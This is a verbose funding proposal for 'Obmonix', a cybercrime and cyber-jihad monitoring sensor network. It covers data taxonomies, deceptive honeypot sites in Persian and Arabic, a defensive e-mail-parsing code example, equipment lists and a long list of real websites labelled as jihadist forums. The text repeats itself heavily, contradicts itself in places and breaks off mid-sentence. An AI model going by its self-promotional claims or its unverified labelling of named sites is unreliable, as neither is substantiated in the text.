named Disruptive Individuals and the Obmonix - Cybercrime and Cyber Jihad Fighting Sensor Network.

Having successfully pioneered my own methodology for processing threat intelligence data, including active

dissemination of threat intelligence data to a variety of sources, including an in-depth understanding of the

Intelligence Cycle, I’m certain that based on my experience the time has come to establish a professional and working

relationship with a government-private sector enterprise leading me to a successful project proposal within the

Intelligence Community and the security industry.

My initial goal for submitting a project proposal is to ensure that the Intelligence Community remains on the

top of its game and that the United States remains ahead of adversaries looking to profit from its economic might

including the successful compromise of its infrastructure potentially targeting the lives and well-being of its citizens

globally.

Largely relying on a set of industry-leading contacts, my initial idea is to ensure that the Intelligence Community

remains actively empowered with the world’s largest and most comprehensive platform for monitoring, profiling

and proactively responding to malicious nation-state malicious actors type of cybercrime and cyber-jihad activity

globally through the successful establishing of a government-private sector type of partnership leading me to a

successful launch of my own company leading me to a successful project-based type of project proposal.

Having actively contributed to the overall demise of cybercrime internationally through the last decade, I’m

certain that my expertise, ambition and expertise in the field will successfully contribute to the Intelligence

Community’s overall mission including a currently active project within the Intelligence Community and the security industry.

I sincerely hope that my project proposal will be eventually funded leading me to become an active participant

within the Intelligence Community with a currently active project within the Intelligence Community and the

security-industry.

Company Overview

The following brief will provide a detailed summary of the company overview including key success factors

and a project taxonomy.

Disruptive Individuals is a research-intensive data-driven company successfully establishing the world’s largest

snapshot of malicious cybercrime activity for the purpose of offering the industry the world’s most versatile portfolio

of malicious cybercrime-driven services, successfully positioning itself as the world’s leading provider of real-time

intelligence-driven services and product portfolio including cybercrime-research data, malicious activity profiling

services and custom-tailored intelligence assessments, successfully positioning the company as the world’s leading

provider of cybercrime-data driven research-intensive intelligence data-driven company.

Key Success Factors

• the platform will be ultimately capable of establishing the industry’s largest data set of cybercrime activity

for the purpose of real-time monitoring and profiling of malicious cybercrime activity successfully infiltrating

the majority of cybercrime forum communities successfully establishing the foundations for an intelligence

gathering process

• the platform will be ultimately capable of real-time forum data localization for the purpose of successfully

establishing the foundations for a successful intelligence gathering process

• the platform will be ultimately capable of establishing the foundations for real-time monitoring and profiling

of malicious activity including forum member data successfully establishing the foundations for a successful

intelligence gathering process

• the platform will be ultimately capable of establishing the world’s largest data set of historical cybercrime activity

successfully establishing the foundations for a successful intelligence gathering process

Return on Investment

• research-based forum activity driven intelligence feeds

• the company will be ultimately capable of offering subscription based type of intelligence driven services

including intelligence and data-driven cybercrime and malicious-activity capable feeds

• community-driven data processing capabilities

• the company will be ultimately capable of offering public feeds to include the necessary data for the purpose of

establishing an active community-based intelligence-data driven type of services and feeds

• intelligence feed subscription type of managed intelligence-feed driven services

• the company will be ultimately capable of offering tailored intelligence-driven data feeds successfully empowering

security enthusiasts, security experts, researchers and government contractors with the necessary data and

expertise to offer an insight into the company’s vast network of data and intelligence driven type of services

Company Data Project Taxonomy

This intelligence brief will detail the basic company project taxonomy structure for the purpose of establishing the

foundations for a successful data and intelligence-driven type of research based type of cybercrime and

malicious-activity tracking activity to include but not limited to cybercrime community forum data and active social media

monitoring and profiling capabilities.

Cybercrime Sensor Network

This intelligence brief will detail the basic company project taxonomy structure for the purpose of establishing the

foundations for a successful data and intelligence-driven type of research based type of cybercrime and

malicious-activity tracking activity to include but not limited to cybercrime community forum data and active social media

monitoring and profiling capabilities.

Spam Message

• spam source

• spam message

• nation-state actors

• malicious-adversaries

• country

• hosting provider

• ASN

• IP reputation

• message

• embedded URL

• embedded attachment

Phishing Message

• phishing source

• phishing message

• nation-state

• malicious-actors

• spear-phishing

• targeted-attack

• country

• hosting provider

• ASN

• IP reputation

• message

• embedded URL

• embedded attachment
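
The message-derived fields of the Spam Message and Phishing Message lists above, populated from a raw e-mail, as an added example that is not part of the original proposal or any Obmonix code. The record layout, function names, enrichment table and sample message are constructed assumptions; the enrichment values use documentation-only IP ranges and ASN.

```python
import hashlib
import ipaddress
import re
from dataclasses import dataclass, field
from email import message_from_bytes, policy
from typing import Optional

# Constructed enrichment data (documentation IP range and ASN); a real sensor
# would query its GeoIP, ASN and reputation sources here instead.
ENRICHMENT = {
    ipaddress.ip_network("203.0.113.0/24"): {
        "country": "ZZ", "hosting_provider": "Example Hosting",
        "asn": "AS64496", "ip_reputation": "listed"},
}
# Relays operated by the sensor itself; their hops are skipped.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)
BRACKETED_IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


@dataclass
class SpamRecord:
    """Message-derived taxonomy fields; actor attribution is left to the analyst."""
    spam_source: Optional[str] = None
    country: Optional[str] = None
    hosting_provider: Optional[str] = None
    asn: Optional[str] = None
    ip_reputation: Optional[str] = None
    message: str = ""
    embedded_urls: list = field(default_factory=list)
    embedded_attachments: list = field(default_factory=list)


def source_ip(msg) -> Optional[str]:
    """First non-internal IP in the Received chain, read top down.
    Every hop prepends its header, so the topmost ones come from our own
    servers; everything below the first external hop is sender-controlled.
    """
    for hop in msg.get_all("Received", []):
        for candidate in BRACKETED_IP_RE.findall(str(hop)):
            try:
                ip = ipaddress.ip_address(candidate)
            except ValueError:  # malformed literal such as 999.1.1.1
                continue
            if not any(ip in net for net in INTERNAL_NETS):
                return str(ip)
    return None


def build_record(raw: bytes) -> SpamRecord:
    msg = message_from_bytes(raw, policy=policy.default)
    rec = SpamRecord(spam_source=source_ip(msg), message=str(msg.get("Subject", "")))
    if rec.spam_source:
        ip = ipaddress.ip_address(rec.spam_source)
        for net, info in ENRICHMENT.items():
            if ip in net:
                for key, value in info.items():
                    setattr(rec, key, value)
    for part in msg.walk():
        if part.is_multipart():
            continue
        payload = part.get_payload(decode=True) or b""
        if part.get_content_disposition() == "attachment" or part.get_filename():
            # Hash only, never open; the filename is attacker-controlled data
            # and must not be used as a filesystem path.
            rec.embedded_attachments.append({
                "filename": part.get_filename(),
                "sha256": hashlib.sha256(payload).hexdigest()})
        elif part.get_content_maintype() == "text":
            # URLs are ASCII, so a lossy UTF-8 decode is enough to find them.
            for url in URL_RE.findall(payload.decode("utf-8", "replace")):
                url = url.rstrip(".,;)")
                if url not in rec.embedded_urls:
                    rec.embedded_urls.append(url)
    return rec


# Constructed sample; the lower Received header imitates a forged hop.
SAMPLE = (
    b"Received: from mail.example.net (mail.example.net [203.0.113.25])\r\n"
    b"\tby sensor.example.org with ESMTP; Mon, 01 Jan 2018 10:00:00 +0000\r\n"
    b"Received: from bank.example.com (unknown [198.51.100.7])\r\n"
    b"Subject: Invoice overdue\r\n"
    b"Content-Type: multipart/mixed; boundary=\"b1\"\r\n"
    b"\r\n"
    b"--b1\r\n"
    b"Content-Type: text/html; charset=utf-8\r\n"
    b"\r\n"
    b'<a href="http://pay.example.net/invoice?id=1">View</a> http://pay.example.net/invoice?id=1.\r\n'
    b"--b1\r\n"
    b"Content-Type: application/octet-stream\r\n"
    b"Content-Disposition: attachment; filename=\"invoice.zip\"\r\n"
    b"Content-Transfer-Encoding: base64\r\n"
    b"\r\n"
    b"Y29uc3RydWN0ZWQgc2FtcGxl\r\n"
    b"--b1--\r\n"
)
```

Calling `build_record(SAMPLE)` attributes the message to the hop recorded by the sensor's own mail server and ignores the forged lower header.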

Malicious Software

• nation-state actors

• malicious-adversaries

• C&C phone back location

• country

• hosting location

• ASN

• screenshot

• malicious MD5

Malicious URL

• nation-state actors

• malicious-adversaries

• country

• hosting provider

• ASN

• client-side exploitation

• client-side exploit sample

Android malware

• nation-state actors

• malicious-adversaries

• C&C phone back

• country

• hosting provider

• ASN

• SMS feature

• Screenshot

• malicious MD5

Mac OS X malware

• nation-state actors

• malicious-adversaries

• C&C phone back

• country

• hosting provider

• ASN

• Screenshot

• malicious MD5

Explanation of Honeypot Technology

Honeypot technology greatly ensures that actionable and real-time data of jihadist activities can be acquired, profiled

and analyzed, acting as an early warning system for jihadist activity online. It relies on the systematic positioning of

misconfigured network devices to better allow the use of monitoring sensors attracting malicious traffic leading to an

eventual compromise, allowing for better understanding of the motivation and capability estimation of the attacker

including active motivation and capabilities type of attribution leading to the production of actionable real-time type

of intelligence type of research and analysis type of data.

Honeypot Deployment Strategy

Honeypot technology greatly ensures that actionable and real-time data of jihadist activities can be acquired, profiled

and analyzed, acting as an early warning system for jihadist activity online.

• Fake Newspaper - Al-Jihah

The initial idea behind setting up a fake newspaper (in Persian, Arabic) would be to establish the foundation for a

successful deceptive early warning system sensor further ensuring that actionable and real-time jihadist activity data

can be collected, profiled and interpreted for producing real-time intelligence summary reports. Daily updates with

pro-jihadist material would ensure the quality acquisition of traffic including potential deceptive campaigns to be

intercepted, profiled and analyzed, acting as an early warning system sensor further ensuring the collection of actionable

real-time jihadist activities data.

The Al-Jilah newspaper would act as a central repository for various anti-jihad content, successfully positioning the

paper as a primary attack target for cyber jihadists online, successfully increasing the probability for a successful attack

and eventually collecting and interpreting the attack data. The Al-Jilah newspaper would act as a central repository

of anti-jihad content and would be localized in Persian and Arabic, successfully penetrating local and highly segmented

markets for the purpose of increasing the probability of a successful attack.

Various public placement strategy in terms of positioning the honeypot technology within the eventual attack

compromise activity would include active search engine optimization techniques successfully leading to a great

degree of capability estimation attack traffic and would also result in eventual direct forum placement within various

prominent jihadist activity online forum communities.

• Fake Bank – Arabah Financing

The initial idea behind setting up a fake bank (in Persian, Arabic) would be to establish the foothold of a deceptive

campaign ensuring the collection of actionable real-time jihadist data to be analyzed and profiled. Successfully

positioning the bank within the network assets acquisition would ensure the collection of actionable and real-time

jihadist data further ensuring the successful interception of jihadist activities online.

The initial idea behind setting up a fake bank would be to successfully position a fake Web site successfully resulting

in the active deployment of honeypot appliance technologies for the purpose of monitoring and profiling various

jihadist activity online. Successfully setting up a fake bank in Persian and Arabic would result in the active penetration

of various market segment properties successfully resulting in the active profiling and monitoring of jihadist activity

online.

Successfully setting up a fake bank would result in the active publication of content inter-related news releases

emphasizing on major localized and segment released type of content successfully resulting in the active profiling

and monitoring of various jihadist activity online. Successful positioning in terms of points of contact would ensure

active phishing and malware attack profiling and monitoring successfully resulting in active profiling and monitoring

of jihadist activity online.

• Fake university – Abkazah University

The initial idea behind setting up a fake university (in Persian, Arabic) would be to establish the foothold of a deceptive

campaign ensuring the collection of actionable real-time jihadist data to be analyzed and profiled. Successfully

positioning the bank within the network assets acquisition would ensure the collection of actionable and real-time

jihadist data further ensuring the successful interception of jihadist activities online. Successful positioning in terms

of points of contact would ensure active phishing and malware attack profiling and monitoring successfully resulting

in active profiling and monitoring of jihadist activity online.

The initial idea of setting up a fake university would result in the active profiling and monitoring of various jihadist

community type of jihadist activity online successfully positioning a localized in Persian and Arabic fake university

successfully resulting in the active profiling and monitoring of jihadist activity online. Sample fake university content

type of localized fake university portfolio of facilities and educational courses would result in the active positioning

for a localized and segmented active profiling and monitoring of jihadist activity online.

It would consist of active SCADA research and cyber security type of research and analysis facility allowing the active

monitoring of malicious activity, for the origin source country Iran, Pakistan, Saudi Arabia, Iraq and Syria. Successful

positioning in terms of points of contact would ensure active phishing and malware attack profiling and monitoring

successfully resulting in active profiling and monitoring of jihadist activity online.

• Fake Company – Ostan Industries

The initial idea behind setting up a fake company would be to successfully intercept and profile actionable real-time

jihadist activities online to successfully intercept and profile various jihadist activities online. The initial idea behind

setting up a fake company would be to position a SCADA type of infrastructure localized in Persian, Arabic for the

purpose of successfully profiling and monitoring various jihadist activity online.

With a successful placement and active content generating localized in Persian, Arabic a fake company deployment

using honeypot appliance technology would result in active capability estimation and profiling of various jihadist

activity online. Successful positioning in terms of points of contact would ensure active phishing and malware attack

profiling and monitoring successfully resulting in active profiling and monitoring of jihadist activity online.

Cyber Jihad Sensor Network

This intelligence brief will detail the basic company project taxonomy structure for the purpose of establishing the

foundations for a successful data and intelligence-driven type of research based type of cybercrime and

malicious-activity tracking activity to include but not limited to cybercrime community forum data and active social media

monitoring and profiling capabilities.

• forum topic

the platform will be ultimately capable of processing a particular forum topic for the purpose of establishing the

foundations for a successful intelligence gathering process

• forum message

the platform will be ultimately capable of processing a particular forum message for the purpose of establishing the

foundations for a successful intelligence gathering process

• forum member

the platform will be ultimately capable of processing a particular forum member for the purpose of establishing the

foundations for a successful intelligence gathering process

• forum member message

the platform will be ultimately capable of processing a particular forum member message for the purpose of

establishing the foundations for a successful intelligence gathering process

• forum message

the platform will be ultimately capable of processing a particular forum message for the purpose of establishing the

foundations for a successful intelligence gathering process

• forum message

the platform will be ultimately capable of processing a particular forum external message for the purpose of

successfully establishing the foundations for a successful intelligence gathering process

• forum time

the platform will be ultimately capable of processing a particular forum time for the purpose of establishing the

foundations for a successful intelligence gathering process

• forum data

the platform will be ultimately capable of processing data including date, time, message, URL and email, ultimately

establishing the foundations for a successful intelligence gathering process

• forum URL

the platform will be ultimately capable of processing a particular forum URL further establishing the foundation for

the Obmonix platform further establishing the foundations for a successful intelligence gathering process

• forum media

the platform will be ultimately capable of processing forum media further establishing the foundations for the

Obmonix platform further establishing the foundations for a successful intelligence gathering process

• forum email

the platform will be ultimately capable of processing forum email further establishing the foundations for the

Obmonix platform further establishing the foundations for a successful intelligence gathering process

• forum contact

the platform will be ultimately capable of processing forum contact further establishing the foundations for the

Obmonix platform further establishing the foundations for a successful intelligence gathering process

Sample ISIS Social Media Twitter Accounts:


Detailed Project Funding Stages Information

The initial stage of the project will consist of the selective and timely purchase of all the necessary appliances, including the timely localization and successful acquisition of fake Web site honeypot solutions and the active acquisition of network assets for the purpose of successful honeypot placement.

• The main objective of the initial phase would be to acquire all the necessary equipment for the purpose of setting up the foundations for the Obmonix platform. The equipment will be acquired in a timely fashion, largely relying on a selected set of proprietary, industry-leading contacts.

• The main objective of the next phase would be to ensure that the equipment is placed in a secure location and is properly maintained, so that the operator is capable of operating the Obmonix platform in a secure way.

• The main objective of the next phase would be to establish the foundations of the world’s largest data set of intelligence data for the purpose of ensuring that the Obmonix platform is capable of processing and intercepting the necessary data.

• The main objective of the next phase would be to acquire the necessary proprietary service-based solutions that would empower the operator with the necessary tools to process and intercept data.

• The main objective of the next phase would be to process and intercept the world’s largest data set of cybercrime and cyber jihad data.

Sample Cyber Jihad Forums:


• http://shahamat-english.com

• http://shahamat-farsi.com

• http://shahamat-movie.com

• http://shahamat-urdu.com

• http://shamikh1.info

• http://shamilonline.org/rusnya/index _ru.htm

• http://sharia4indonesia.com

• http://Shiaweb.org

• http://shiaweb.org/hizbulla/index.html

• http://Shmo5alIslam.net

• http://shoutussalam.org

• http://skaba.ps

• http://Sobhank.com

• http://sobhank.com/vb

• http://somalimemo.net

• http://somod.org

• http://soutalhaq.net

• http://Soutweb.100free.com

• http://sqr-al3rb.com

• http://suara-islam.com

• http://sunnahcare.com

• http://sunnahonline.com

• http://suwaidan.com

• http://swalif.net

• http://syamina.com

• http://syamorganizer.com

• http://tahrir-syria.info

• http://tajdeed.org.uk

• http://takvahaber.net
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• http://tarani.info

• http://Tawhed.ws

• http://tevhiddergisi.com

• http://tevhiddersleri.com

• http://tevhididavet.com

• http://tevhidigundem.net

• http://theshamnews.com

• http://thethirdjihad.com

• http://thoriquna.com

• http://thoriquwna.com

• http://toorabora.org

• http://turkhackteam.org

• http://twelvershia.net

• http://uicforce.co.vu

• http://ummah.com

• http://ummahislam.com

• http://ummetislam.info

• http://ummetislam.net

• http://vb999.maktoobblog.com

• http://vb.fpnp.net

• http://vb.roro44.com/index.php

• http://vd.ag

• http://vdagestan.com

• http://voa-islam.com

• http://W-N-N.net

• http://Wa3ad.org

• http://wa3iarabi.com

• http://wa7at.org/vb

• http://wap.kavkaz.tv

• http://worldakhbar.com

• http://worldnet.ws
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• http://worldnet.ws/radio/index.html

• http://worldnet.ws/vb

• http://yenidenislam.com

• http://zad-muslim.com

• http://zaeer1.22web.net

• http://zaidhamid.pk

• http://zuheer17.maktoobblog.com

Detailed Project Funding Phase Information

01. The initial stage of the project will consist of selective and timely purchase of all the necessary appliances

including the timely localization and successful acquisition of fake Web sites honeypot solutions including the active

acquisition of network assets for the purpose of successful honeypot solution placement.

• Associated deliverables will include access to proprietary technology the ability to associate long-term task

including the ability to set the foundation for the Obmonix platform including eventual commercialization of the

Obmonix platform further enhancing the operator’s ability to continue providing the Intelligence Community

with the necessary data to proactively respond to a growing set of malicious nation-state and malicious actors

type of cybercrime and cyber-jihad activity globally.

02. The next stage will consist of active placement of the required equipment in a secure location including the

placement of active security measures to ensure that the Obmonix operator remains at work in a secure location,

including the premises.

• Associated deliverables will include secure work place including the ability to empower the operator with the

necessary data to perform various operator activity ensuring global presence for Intelligence Community

members and the security industry.

03. The next stage will consist of active spam, phishing and malware feed access purchase including successfully

geolocated placement within specific regions of interest including but not limited to Algeria, Argentina,

Bahrain, Bolivia, Brazil, Burkina Faso, Chile, China, Colombia, Cyprus, Ecuador, Guatemala, Jordan, Democratic

People’s Republic of Korea, Liberia, Macao, Maldives, Moldova, Republic of Nauru, Niger, Pakistan, Poland, Romania,

Sierra Leone, Sudan, Syrian Arab Republic, Togo, Uganda, Vanuatu, Yemen.

• Associated deliverables will include access to the world’s largest portfolio of threat intelligence data set including

access to real-time data successfully empowering the operator with the necessary data to perform an operator

activity.

04. The next stage will include the active acquisition of service-based type of localization and acquisition solutions

leading to a successful set of data to be processed and collected by the sensor.

• Associated deliverables will include access to proprietary technology successfully empowering the operator

with the necessary data to perform the operator activity including real-time monitoring of the world’s largest

and most comprehensive sensor network based type of cybercrime and cyber-jihad sensor based type of

platform.

05. The next phase will include the active data acquisition from the Intelligence Community’s leading intelligence

gathering platform in the form of active data placement including the establishment of an active threat

intelligence-gathering portal based type of platform.

• Associated deliverables will include the world’s largest data set of cybercrime and cyber jihad activity sensor type

of platform eventually leading the Obmonix platform to reach a commercialization stage further enhancing the

Intelligence Community’s and the security industry’s mission.

Detailed Project Cost Proposal Information

The initial stage of the project will consist of selective and timely purchase of all the necessary appliances

including the timely localization and successful acquisition of fake Web sites honeypot solutions including the active

acquisition of network assets for the purpose of successful honeypot solution placement.

• FortiMail

Key points:

• The appliance is capable of processing millions of emails on a daily basis

• The appliance is capable of maintaining a list of thousands of fake emails allowing additional attribution,

potentially expanding the capabilities of the appliance to include additional custom made spam origin sources.

• The appliance is capable of delivering actionable intelligence on millions of spam origin sources, for Iran,

Pakistan, Saudi Arabia, Iraq and Syria, on a daily basis

• The appliance is capable of delivering detailed information, leading to the production of actionable intelligence,

for Iran, Pakistan, Saudi Arabia, Iraq and Syria, on a daily basis.

The FortiMail appliance would ensure the active acquisition of spam for the purpose of establishing the foundations

for a successful research, monitoring and analysis system allowing the systematic,

real-time and automated acquisition of malicious software, phishing and social engineering.

• Blue Coat Malware Analysis

Key points:

• The appliance is capable of processing thousands of malware samples, on a daily basis

• The appliance is capable of maintaining detailed information processed and delivered in an automated fashion

for malicious sources originating in Iran, Pakistan, Saudi Arabia, Iraq and Syria

• The appliance is capable of interacting with Web links found in malicious spam emails for the purpose of

establishing the foundations for successful monitoring of malicious software, phishing and social engineering

originating from Iran, Pakistan, Saudi Arabia, Iraq, and Syria including the automated processing and interaction

with mobile malware

• The appliance is capable of maintaining detailed information leading to the production of quality real-time,

actionable intelligence reports on malicious software, phishing and social engineering origin

sources for Iran, Pakistan, Saudi Arabia, Iraq and Syria

The Blue Coat Malware Analysis appliance would ensure the automated and real-time acquisition of malicious software,

phishing and social engineering data for research and analysis of activity originating

in these sources.

• Vormetric encryption appliance

Key points:

• The encryption appliance would ensure the real-time storage of the research and analysis

data to ensure the availability, confidentiality and integrity of the data for the purpose of

producing actionable real-time intelligence based research and analysis reports.

• The encryption appliance would ensure the active real-time storage of the actionable, real-time delivered

research and analysis data allowing the efficient, systematic and automated processing and

analysis of research report data.

The encryption appliance would ensure that the platform operator is properly empowered with the necessary data,

techniques and technologies to properly act upon, analyze and respond to cybercrime and cyber jihad events globally.

• Barracuda Web Application appliance

Key points:

• The Web application appliance would allow the automated secure use of the robot system allowing the

systematic real-time data acquisition on various jihadist sources

• The Web application appliance would ensure the automated and efficient use of the robot in a secure fashion

allowing the production of real-time actionable intelligence and of research and analysis data.

The Web application appliance would ensure that the operator is properly empowered with the necessary data,

techniques and technologies to properly act upon, analyze and respond to cybercrime and cyber jihad events globally.

• Checkpoint DDoS Protector

Key points:

• The appliance is capable of preventing exposure of the network assets utilized by the network, which could

potentially result in the exposure of the availability, confidentiality and integrity of the information

• The appliance is capable of ensuring the real-time, automated and persistent availability, integrity and

confidentiality of the information

The Checkpoint DDoS Protector would ensure the constant availability of the network infrastructure utilized in this

project potentially preventing compromise of the network assets resulting in improved productivity and realization

of various project objectives.

• Encryption appliance

Key points:

• The encryption appliance is capable of ensuring the confidentiality, integrity and availability of the information

• The encryption appliance is capable of distinguishing between multiple networks further ensuring a closed

network type of network access

The encryption appliance would ensure that the maximum possible security measures are in place, further

ensuring that access to the closed restricted network remains as private as possible, ensuring the confidentiality,

integrity and availability of the information to further ensure the active real-time intelligence based

research and analysis data.

• Cisco Catalyst

Key points:

• The appliance is capable of ensuring the real-time and automated use of the network equipment necessary to

maintain the active infrastructure to ensure that it’s operating in an automated and efficient fashion

Cisco Catalyst is network equipment allowing the efficient interconnection between all the

platforms and network equipment used in this project.

• Kapow appliance

Key points:

• The appliance is capable of processing hundreds of thousands of Web sites on a daily basis ensuring the

automated processing and analysis of jihadist communities allowing the automation of the monitoring process

to further enhance the produced actionable intelligence leading to research and analysis

data.

• The appliance is capable of monitoring and establishing the foundations for real-time monitoring and analysis

of jihadist communities for the purpose of producing actionable real-time intelligence research and analysis

data.

• The appliance is capable of processing multiple jihadist forum communities for the purpose of establishing the

foundations for successful real-time actionable intelligence producing research and analysis

data.

The analysis appliance would ensure timely and real-time access to current and historical intelligence data in regard

to jihadist activities online, through the systematic, automated and real-time data acquisition from a variety of public

and closed sources for the purpose of setting up the foundations for a successful data source leading to successful

analysis and research activities.

• Appliance router

Key points:

• The appliance router would ensure the constant and real-time availability of the network assets for the purpose

of active and timely acquisition of actionable real-time research and analysis report data.

The purpose of the appliance router would be to ensure real-time connectivity with a variety of platforms to ensure

that the operator is properly empowered with the necessary data, techniques and technologies to properly act upon,

analyze and respond to cybercrime and cyber jihad events globally.

• Analytics appliance

Key points:

• The analytics appliance would be capable of performing real-time assessment of cybercrime and cyber jihad

events globally and will ultimately empower the Obmonix platform operator with the necessary data,

information and knowledge to act upon, prevent and respond to cybercrime and cyber jihad events globally

The purpose of the appliance would be to empower the operator with the necessary data, information and knowledge

to act upon, react to and respond to various cybercrime and cyber jihad events globally.

• Rosette appliance

Key points:

• The localization appliance will ultimately empower the Obmonix platform operator with the necessary data,

information and knowledge to act upon, respond to and prevent widespread damage while analyzing cybercrime

and cyber jihad events globally.

The purpose of the localization appliance would be to empower the Obmonix platform operator with the necessary

data, information and knowledge to act upon, respond to and prevent widespread damage provoked by cybercrime

and cyber jihad events globally.

• Systran appliance

Key points:

• The Systran appliance will ultimately empower the operator with the necessary data, information and knowledge

to act upon, respond to and prevent widespread damage while analyzing cybercrime and cyber jihad events

globally.

The purpose of the Systran appliance would be to empower the Obmonix platform operator with the necessary data,

information and knowledge to act upon, respond to and prevent widespread damage provoked by cybercrime and

cyber jihad events globally.

Funding Phase

The initial funding phase will consist of active acquisition of assets for the purpose of obtaining access to

industry leading and proprietary selected providers of threat intelligence for the purpose of establishing the

foundations for an active sensors network type of cybercrime/cyber jihad monitor sensor network type of data. The

initial stage will consist of obtaining assets for the purpose of obtaining access to industry leading and proprietary

selected equipment for the purpose of setting the foundations for a successful sensor network based type of data.

The initial phase will consist of active purchase of the following equipment: FortiSandbox, Blue Coat Malware

Analysis, NAS Storage, Cisco Firewall, PfSense, Cisco Catalyst, Vormetric encryption appliance, including the following

subscription-based type of threat intelligence gathering data - Team Cymru threat data feed, Kaspersky threat

data feed, Abusix threat data feed, MalwarePatrol threat data feed, Sophos threat data feed, OPSWAT, Abusix

Threat Feed, ProjectHoneypot threat data feed.

- Kaspersky Data Feed

- Sophos Data Feed

- Team Cymru Data Feed

- MalwarePatrol Data Feed

- Abusix Data Feed

- LookingGlass Data Feed

- Cyren Data Feed

- Symantec Data Feed

- VirusTotal Data Feed

- ProjectHoneypot Data Feed

The second funding phase will consist of active acquisition of honeypot appliance including active netblock

purchase within a dedicated set of countries for the purpose of establishing the foundations of an active sensor

network type of data-acquisition activities. The second funding phase will consist of active acquisition of the following

proprietary appliances: Honeybox Enterprise, honeybox SCADA, including netblocks within the following countries,

The third funding phase will consist of active purchase of service and solution-based appliance, including data-

processing appliance, including localization appliance, for the purpose of setting up the foundations for the Obmonix

platform successfully empowering its operator with the necessary data and expertise for the purpose of actively

responding to global cybercrime and jihad events.

The third funding phase will consist of active purchase of the following appliances: Kapow Software, Rosette

appliance, Systran appliance, Sentinel appliance, Palantir appliance.

The fourth funding phase will consist of active purchase of the World’s most popular solution-oriented portal

for Information Security - Expedited Entry Into the Cyber Warfare Realm – a Pro-U.S Based Offensive and

Asymmetric Cyber Warfare Practical Trends Application Big Data and Research-Centered R&D Platform - further ensuring

successful and ongoing commercialization including the active acquisition of client-base, including the establishment

of the World’s largest endpoint based sensor network for tracking and responding to cybercrime and jihad events

globally.

Dancho Danchev will build a pro-U.S offensive and asymmetric cyber warfare program that will inevitably dive

deep into the Cyber Warfare realm and will produce what can be best described as the U.S primary source for

offensive and asymmetric cyber warfare information repository and data-information on current and future trends

and provide the foundations for a successful R&D cyber warfare partnership with millions of loyal Pro-Western

cyber warriors and researchers globally positioning the platform as the leading think-tank for practical and relevant

cyber warfare power including the World’s leading Pro-Western Cyber Warfare Research and Development research

program center.

With the U.S attempting to tackle the country’s perceived and outdated misunderstanding of Cyber Warfare

in today’s modern Russia, China and Iran dominated Cyber Warfare Realm including the ongoing shortage of

recruitment and relatively outdated and not necessarily dynamic HR-management pool of hundreds of thousands of

Pro-U.S Cyber Warriors, the platform will ultimately empower the re-positioning of the U.S as the dominant Cyber Warfare

power by providing actionable think-tank type of proactive Cyber Warfare insight including the active

and permanent recruitment of millions of Pro-U.S Cyber Warriors further supporting the U.S’s mission on its way to

dominate and launch offensive and defensive cyber missions and related research attacks.

The project will conduct what can be best described as the most comprehensive study and analysis of the

United States’ outdated understanding of the Cyber Warfare realm and provide actionable and practical insight

including a production-ready HR-management and Big Data driven Cyber Warfare platform successfully disrupting

international cybercrime networks conducting economic terrorism infiltrating the vibrant cyber-crime and cyber jihad

international community and successfully recruiting millions of Pro-U.S Cyber Warriors. The First Stage of the project

would ensure that the foundations for a successful invite-only Pro-U.S Cyber Warfare community have already been

established through the direct launching and operation of the World’s Largest and Proprietary Invite-Only Pro-U.S

Cyber Warfare Forum Community.

Associated deliverables will include: the World’s largest search engine for security information, the World’s

most vibrant community for security job search, the World’s most vibrant proprietary community for sharing,

disseminating, communicating and enriching security data, the World’s most comprehensive sensor network for observing,

disseminating and responding to global cybercrime-events, the release of community-enriched security router, the

successful release of community-enriched privacy router, the development and release of community-enriched

public threat feed, the release of community-enriched private threat feed, including, proprietary threat feed, targeted

threat intelligence on demand type of research and analysis producing solution, proprietary bug bounty solution,

hacking and security-oriented online radio, hacking and security-oriented E-zine, hacking and security-oriented

videocast, on-demand penetration testing and offensive team consulting, on-demand Web site monitoring for

security events, OEM partnership capabilities, custom-build anti-virus scanner capabilities.

Community Industry Reference

The contractor Dancho Danchev is an internationally recognized cybercrime researcher, security blogger and threat

intelligence analyst in the field of cybercrime research, having successfully contributed to the overall demise of

cybercrime internationally throughout the past decade and having successfully pioneered a variety of threat intelligence

gathering methodologies leading him to a successful pursuit of high-profile nation-state actors and malicious

adversaries across the globe. The researcher successfully launched a startup named Disruptive Individuals aiming

to disrupt and undermine the international cybercrime and cyber-jihad ecosystem globally.

Statement of Work (SOW)

01. Vendor contact - the initial stage of the project will consist of direct contact between industry leading commercial

security appliance providers further requesting pricing and shipping details including a “point-of-contact”.

• Possible deliverables consisting of the initial stage include industry-leading security appliance - FortiMail, Blue

Coat Malware Analysis, FortiSandbox, Vormetric encryption appliance, Barracuda Web Application appliance,

Checkpoint DDoS Protector, Ethernet encryptor, Cisco Catalyst, Kapow appliance, Palantir appliance, Cisco

firewall appliance, Rosette appliance, Systran appliance, NAS appliance, pfSense appliance, Honeybox appliance,

Honeybox SCADA appliance.

02. Vendor netblock contact - The initial stage of the project will consist of direct contact between industry leading

providers of netblock requesting pricing information for specific pre-defined geolocated regions of interest.

• Possible deliverables including netblock in Algeria, Argentina, Bahrain, Bolivia, Brazil, Burkina Faso, Chile, China,

Colombia, Cyprus, Ecuador, Guatemala, Jordan, Democratic People’s Republic of Korea, Liberia, Macao,

Maldives, Moldova, Republic of Nauru, Niger, Pakistan, Poland, Romania, Sierra Leone, Sudan, Syrian Arab Republic,

Togo, Uganda, Vanuatu, Yemen.

03. Vendor threat data contact - the initial stage of the project will consist of direct contact between industry-leading

including a selected set of threat data providers requesting pricing information including possible partnership

opportunity.

• Possible deliverables including Team Cymru threat data feed, Kaspersky threat data feed, Abusix threat data

feed, MalwarePatrol threat data feed, Sophos threat data feed, OPSWAT, Abusix Threat Feed, ProjectHoneypot

threat data feed.

04. Secure location foundation - the initial stage of the project will consist of direct evaluation of the infrastructure

required for the secure location including direct contact between security vendors to ensure a secure location.

• Possible deliverables include military-grade fence, surveillance, security guard.

05. Vendor connection contact - the initial stage of the project will consist of direct contact between vendor to

ensure that the infrastructure is properly secured ensuring a timely and secure infrastructure.

• Possible deliverables include direct connection.

06. Secure work environment - the initial stage of the project will consist of direct evaluation including a direct

purchase of a work terminal to ensure a smooth and secure work environment

• Possible deliverables including RF shielding, SEL SP–157, FSPK-10, SEL SP-113 "Blockade".

07. Secure work environment - the initial stage of the project will consist of direct evaluation including a direct

